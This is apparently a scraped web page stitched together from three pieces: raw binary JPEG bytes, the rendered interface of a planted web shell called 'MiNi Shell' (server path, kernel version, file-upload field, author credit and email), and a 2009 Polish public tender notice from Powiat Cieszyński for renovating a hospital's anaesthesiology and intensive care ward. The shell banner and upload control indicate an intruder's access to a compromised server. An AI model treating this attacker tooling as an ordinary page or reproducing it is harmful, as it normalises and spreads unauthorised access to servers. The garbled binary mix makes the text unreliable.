JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090715/112293-N-2009.html

<p class="kh_header"><b>Cieszyn: Roboty budowlano-instalacyjne OAiIT</b><br>
<b>Numer ogłoszenia: 112293 - 2009; data zamieszczenia: 15.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Cieszyński w imieniu którego występuje Zarząd Powiatu Cieszyńskiego , ul. Bobrecka 29, 43-400 Cieszyn, woj. śląskie, tel. 033 4777213, 4777214, faks 033 4777333.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.cieszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlano-instalacyjne OAiIT.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlano - instalacyjnych Oddziału Anestezjologii i Intensywnej Terapii zlokalizowanej w budynku Pawilonu Diagnostyczno - Zabiegowego (PDZ) Szpitala Śląskiego w Cieszynie, ul Bielska 4,  na podstawie załączonych projektów budowlanych i wykonawczych PB + PW, które obejmują:
1.1. roboty ogólno - budowlane:
1.1.1. rozbiórki ścianek działowych i podłoży pod posadzki,
1.1.2. drobne naprawy istniejących ścian,
1.1.3. nowe ścianki działowe, obudowy,
1.1.4. tynki ścian istniejących i nowych,
1.1.5. wykończenie ścian - malowanie i okładziny z płytek ceramicznych,
1.1.6. podłoża i posadzki z wykładzin z tworzyw sztucznych i z płytek kamionkowy gres,
1.1.7. sufity podwieszane typu Ecophon Hygienic,
1.1.8. stolarka drewniana,
1.1.9.stolarka aluminiowa,
1.1.10.stolarka p.poż.,
1.1.11.odbojnice i narożniki,
1.1.12.parapety wewnętrzne,
1.1.13.inne (rury Spiro, progi i listwy osłaniające - Al., obmurowania brodzików
1.1.14.zabezpieczenia p.poż. przejść instalacyjnych,
1.1.15.Wykonawca winien zabezpieczyć oddzielenie Oddziału OIOM-u od pozostałej części PDZ na czas prowadzenie robót budowlano - instalacyjnych,
1.2. roboty budowlane - konstrukcyjne:
1.2.1. wiercenie otworów,
1.2.2. montaż belek stalowych,
1.2.3. rozbiórka elementów konstrukcji żelbetowej z robotami zabezpieczającymi.
1.2.4. zabezpieczenia antykorozyjne belek stalowych,
1.2.5. wykonanie ram stalowych przy otworach w płytach stropowych,
1.2.6. montaż podstaw stalowych w istniejących stropach do mocowania kolumn anestezjologicznych w czterech salach chorych, wg rozwiązania zastosowanego w 5 salach operacyjnych na poziomie P2.
1.2.7. montaż wzmocnienia stropu z konstrukcji stalowej przy projektowanym otworze,
1.2.8. zabezpieczenie pożarowe konstrukcji stalowych i wzmocnienia stropu (elementów odsłoniętych).
1.3. roboty instalacyjne wentylacji i klimatyzacji:
1.3.1. nawiew centralny z centralą wentylacyjną do pomieszczeń - pokoje pacjentów,
1.3.2. wywiew centralny W.2a - pokoje pacjentów,
1.3.3. nawiew do pomieszczeń zaplecza z centralą wentylacyjną,
.3.4. wywiew z pomieszczeń zaplecza,
1.3.5. wywiewy indywidualne,
1.3.6. inne (wykucie otworów, wnęk itp..)
1.3.7. uruchomienie i regulacja,
1.4. instalacja wod - kan:
1.4.1. demontaż pionów instalacji wod-kan,
1.4.2. montaż instalacji kanalizacji sanitarnej,
1.4.3. montaż instalacji zwu, cwu i cyrkulacji
1.4.4. montaż przyborów sanitarnych,
1.4.5. wykonanie robót budowlanych (przebicia, wykucia, zamurowania),
1.5. instalacja gazów medycznych z sygnalizacją alarmową:
1.5.1. montaż instalacji gazów medycznych z sygnalizacją alarmową,
1.6. instalacje elektryczne:
1.6.1. roboty przygotowawcze (przebicia, wykucia bruzd, przepusty rurowe),
1.6.2. montaż rozdzielni,
1.6.3. montaż opraw - oświetlenie podstawowe,
1.6.4. montaż opraw - oświetlenie awaryjne hybryd,
1.6.5. montaż instalacji gniazd wtyczkowych i siły technologicznej,
1.6.6. montaż instalacji zasilania urządzeń słaboprądowych,
1.6.7. montaż instalacji zasilania wentylacji mechanicznej,
1.6.8. montaż instalacji ochrony przeciwporażeniowej,
1.6.9. montaż instalacji ochrony przeciwprzepięciowej,
1.6.10.montaż połączenia wyrównawczego,
1.6.11.montaż połączenia wyrównawczego ekwipotencjalnego,
1.6.12.wykonanie robót budowlanych (zamurowania, tynki, bruzdy itp.),
1.6.13.wykonanie pomiarów elektrycznych i dokumentacja odbiorowa.
1.7. instalacje słaboprądowe:
1.7.1. montaż instalacji telewizji przemysłowej - CCTV,
1.7.2. montaż instalacji kontroli dostępu,
1.7.3. montaż instalacji sygnalizacji włamania,
1.7.4. przystosowanie obiektu do instalacji sygnalizacji pożaru - OAiIT,
1.7.5. montaż instalacji sygnalizacji pożaru - OAiIT,
1.7.6. montaż instalacji sieci telefoniczno - komputerowej
1.8. instalacje telefoniczne:
1.8.1. montaż urządzeń telefonicznych.
 
Organizacja robót:
1.9. Roboty budowlane: 
1.9.1. Wykonawca winien zabezpieczyć oddzielenie Oddziału OIOM-u od pozostałej części PDZ na czas prowadzenie robót budowlano - instalacyjnych,
1.9.2.  Wykonawca winien zabezpieczyć w sposób skuteczny (np. folia budowlana gruba i płyta pilśniowa) istniejącą posadzkę z tworzywa sztucznego w korytarzu na całej długości OIOM-u i dróg transportowych od początku miejsca rozpoczęcia dostaw materiałów.
1.9.3. Wykonawca winien wykonać kasowanie zacieków i malowanie pomieszczeń na poziomie P1 w przypadku wystąpienia zacieków i zalania stropów oraz ścian (na powierzchnia poniżej OAiIT),
1.9.4. Wykonawca winien ująć wykucie i montaż okna w ścianie szczytowej do transportu materiałów oraz naprawę elewacji zewnętrznej wraz z elewacją wewnętrzną w obrębie okna. 
1.9.5. Wykonawca winien dokonać naprawy w nawierzchni placu i dróg od sprzętu ciężkiego (nawierzchnia z kostki habeton, wiadukt o max obciążeniu 15 ton),
1.10. Roboty instalacyjne elektryczne:
1.10.1.Wykonawca winien uwzględnić przełożenie kabli zasilania awaryjnego hybryd i zasilania awaryjnego central wentylacyjnych z części środkowej na część prawą OAiIT,
1.10.2. Wykonawca winien uwzględnić przełożenie instalacji niskoprądowej (zasilanie klap i czujek pożarowych),
1.10.3.Klapa pożarowa w klatce K2 winna być zasilana z rozdzielni przy szybie windowym przy K2. Obecnie jest zasilana z oświetlenia ewakuacyjnego korytarza poziomu P2 (część pwawa),
1.11. Roboty instalacyjne sanitarne:
1.11.1. Wykonawca winien zabezpieczyć przez oddzielenie ciągów wentylacji mechanicznej i klimatyzacji w strefie OAiIT od pozostałych stałych ciągów wentylacji mechanicznej i klimatyzacji obiektu.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.51.42-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 65.000,00zł (słownie: sześćdziesiąt pięć tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni na podstawie art. 24           ust. 1 uPzp oraz spełniający wymogi art. 22 ust. 1 uPzp tj:
a) posiadają uprawnienia niezbędne do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b) posiadają niezbędną wiedzę i doświadczenie, tj. udokumentują wykonanie (rozpoczęcie 
i zakończenie) w ciągu ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizował, co najmniej jedną robotę budowlaną o wartości minimum 3.000.000zł w której zakres wchodziło wykonanie specjalistycznej roboty instalacyjnej, np. instalację gazów medycznych;
c) dysponuje osobami posiadającymi uprawnienia do kierowania robotami budowlanymi  
w zakresie niezbędnym do wykonania zamówienia w specjalnościach: 
- konstrukcyjno-budowlanej, 
- instalacyjnej w zakresie sieci, gazów medycznych, instalacji i urządzeń cieplnych, wentylacyjnych i klimatyzacji, wodociągowych i kanalizacyjnych,
 -  instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych i elektrycznych budowlanych,
d) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2. Zamawiający będzie oceniał powyższe warunki na podstawie dokumentów, o których mowa w pkt 6 SIWZ. Oferta musi być zgodna ze wszystkimi wymogami SIWZ oraz uPzp.
3. Ocena spełniania warunków udziału w postępowaniu będzie dokonywana metodą wg formuły spełnia - nie spełnia. 
4. Nie spełnienie warunków udziału w postępowaniu, skutkuje wykluczeniem Wykonawcy i odrzuceniem oferty z zastrzeżeniem art. 26 ust. 3 uPzp.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Na ofertę składają się następujące dokumenty i załączniki: 
1) formularz ofertowy,
2) oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne zgodnie z art. 22 ust. 1 uPzp,
3) kserokopie wniesienia wadium,
4) aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
5) aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń,    że uzyskał  przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert;
6) wykaz wykonanych w okresie ostatnich pięciu lat robót budowlanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości oraz daty 
i miejsca wykonania wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie;
7) wykaz osób posiadających uprawnienia do kierowania robotami budowlanymi  
w zakresie niezbędnym do wykonania zadania oraz zaświadczenia wydane przez właściwą izbę samorządu zawodowego (Okręgową Izbę Inżynierów Budownictwa), potwierdzające wpis danej osoby na listę członków właściwej izby,
8) oświadczenie Wykonawcy o zakresie usług do wykonania przez Podwykonawcę,
12) kosztorys szczegółowy na wymieniony zakres robót,
13) zestawienie R, M, S,
14) stawki r-g i narzuty stawki r-g oraz koszty zakupu.

2. Postanowienia dotyczące wnoszenia ofert wspólnie przez dwa lub więcej podmiotów gospodarczych (konsorcja/spółki cywilne):
1) Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu                     o udzielenie zamówienia lub do reprezentowania w postępowaniu i zawarcia umowy,                  a pełnomocnictwo/upoważnienie do pełnienia takiej funkcji, wystawione zgodnie                      z wymogami prawa, podpisane przez prawnie upoważnionych przedstawicieli każdego              z partnerów, winno być dołączone do oferty; 
2) oferta winna być podpisana przez każdego partnera lub ustanowionego pełnomocnika;
oferta winna zawierać wszystkie dokumenty, oświadczenia i informacje wymienione                      w pkt 2), 4), 5) dla każdego z partnera osobno, pozostałe składane są wspólnie.
3. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów o których mowa w pkt. 1 ppkt. 4), 5) niniejszej SIWZ  Wykonawca składa dokumenty potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenie osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się ww. dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
4. Nie złożenie jakiegokolwiek dokumentu z zastrzeżeniem art. 26 ust. 3 uPzp skutkuje wykluczeniem Wykonawcy i odrzuceniem oferty.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiat.cieszyn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Cieszynie, ul. Bobrecka 29, 43-400 Cieszyn pok. 213.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2009 godzina 09:00, miejsce: Kancelaria Ogólna Starostwa Powiatowego w Cieszynie, ul. Bobrecka 29, 43-400 Cieszyn.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com